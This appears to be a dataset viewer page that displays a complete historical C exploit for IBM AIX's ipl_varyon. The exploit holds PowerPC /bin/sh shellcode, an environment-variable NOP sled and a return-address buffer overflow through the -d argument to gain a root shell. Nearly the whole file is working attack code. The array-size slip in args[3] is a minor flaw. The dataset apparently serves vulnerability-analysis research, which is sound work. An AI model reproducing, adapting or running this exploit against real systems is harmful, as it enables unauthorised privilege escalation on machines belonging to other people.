Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1045.txt100 linesDownload Raw Back to exploits
1/*

2 *

3 *    IBM AIX ipl_varyon elevated privileges exploit

4 *

5 *    I just wanted to play with PowerPC (Tested on 5.2)

6 *

7 *    intropy (intropy <at> caughq.org)

8 *

9 */

10

11#include <stdio.h>

12#include <unistd.h>

13#include <stdlib.h>

14#include <string.h>

15

16#define DEBUG 1

17#define BUFFERSIZE 2048

18#define EGGSIZE 2048

19

20#define NOP 0x60

21#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)

22

23/* lsd */

24char shellcode_binsh[] =

25"\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */

26"\x40\x82\xff\xfd"     /* bnel    <shellcode>          */

27"\x7f\xe8\x02\xa6"     /* mflr    r31                  */

28"\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */

29"\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */

30"\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */

31"\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */

32"\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */

33"\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */

34"\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */

35"\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */

36"\x44\xff\xff\x02"     /* svca                         */

37"/bin/sh"

38"\x05";

39

40unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {

41        int count, env_size = strlen(payload) + environment_size + 4 + 1;

42        unsigned long address, *ret_addressp;

43        

44        if (DEBUG) printf("Adding nops to environment buffer...");

45        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {

46            *(env_buffer++) = NOP;

47        }

48        if (DEBUG) printf("size %d...\n", count);

49        if (DEBUG) printf("Adding payload to environment buffer...");

50        for ( count = 0; count < strlen(payload); count++ ) {

51            *(env_buffer++) = payload[count];

52        }

53        if (DEBUG) printf("size %d...\n", count);

54

55        env_buffer[env_size - 1] = '\0';

56

57        memcpy(env_buffer, "CAU=", 4);

58

59	memset(address_buffer, 'A', buffer_size);

60

61        address = ADDRESS;

62

63        if (DEBUG) printf("Going for address @ 0x%lx\n", address);

64

65        if (DEBUG) printf("Adding return address to buffer...");

66        ret_addressp = (unsigned long *)(address_buffer+3);

67        for ( count = 0; count < buffer_size; count += 4) {

68                *(ret_addressp++) = address;

69        }

70        if (DEBUG) printf("size %d...\n", count);

71

72        address_buffer[buffer_size - 1] = '\0';

73

74        return( 0 );

75}

76

77int main()

78{

79    char *buffer, *egg;

80    char *args[3], *envs[2];

81

82    buffer = (char *)malloc(BUFFERSIZE);

83    egg = (char *)malloc(EGGSIZE);

84

85    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

86

87    args[0] = "/usr/sbin/ipl_varyon";

88    args[1] = "-d";

89    args[2] = buffer;

90    args[3] = NULL;

91

92    envs[0] = egg;

93    envs[1] = NULL;

94

95    execve( "/usr/sbin/ipl_varyon", args, envs );

96

97    return( 0 );

98}

99

100// milw0rm.com [2005-06-14]